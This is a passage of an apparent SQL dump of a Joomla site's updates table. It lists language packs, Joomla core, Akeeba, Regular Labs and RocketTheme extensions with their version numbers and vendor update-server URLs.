Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14173,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14174,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14175,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14176,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14177,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14178,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14179,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14180,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14181,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14182,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14183,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14184,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14185,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14186,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14187,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14188,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14189,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14190,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14191,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(14192,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14193,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14194,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14195,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14196,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14197,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14198,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14199,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14200,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14201,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14202,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14203,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14204,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14205,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14206,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14207,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14208,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14209,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14210,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14211,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14212,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14213,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14214,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14215,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14216,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14217,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14218,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14219,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14220,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14221,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14222,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14223,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14224,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14225,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14226,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14227,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14228,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14229,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14230,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14231,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14232,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14233,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14234,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14235,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14236,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14237,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14238,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14239,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14240,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14241,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14242,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14243,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14244,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14245,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14246,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14247,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14248,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14249,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14250,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14251,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14252,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14253,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14254,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14255,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14256,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14257,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14258,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14259,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14260,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14261,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14262,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14263,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14264,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14265,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14266,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14267,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14268,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14269,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14270,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14271,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14272,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14273,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14274,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14275,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14276,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14277,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14278,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14279,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14280,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14281,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14282,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14283,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14284,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14285,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14286,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14287,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14288,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14289,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14290,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14291,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14292,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14293,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14294,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14295,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14296,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14297,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14298,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14299,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14300,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14301,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14302,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14303,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14304,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14305,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14306,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14307,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14308,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14309,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14310,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14311,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14312,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14313,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(14314,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14315,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14316,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14317,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14318,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14319,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14320,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14321,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14322,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14323,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14324,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14325,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14326,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14327,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14328,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14329,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14330,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14331,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14332,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14333,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14334,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14335,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14336,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14337,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14338,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14339,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14340,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14341,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14342,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14343,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14344,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14345,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14346,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14347,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14348,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14349,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14350,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14351,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14352,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14353,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14354,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14355,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14356,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14357,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14358,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14359,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14360,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14361,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14362,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14363,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14364,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14365,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14366,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14367,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14368,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14369,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14370,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14371,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14372,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14373,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14374,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14375,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14376,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14377,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14378,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14379,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14380,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14381,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14382,57,0,'Chinese 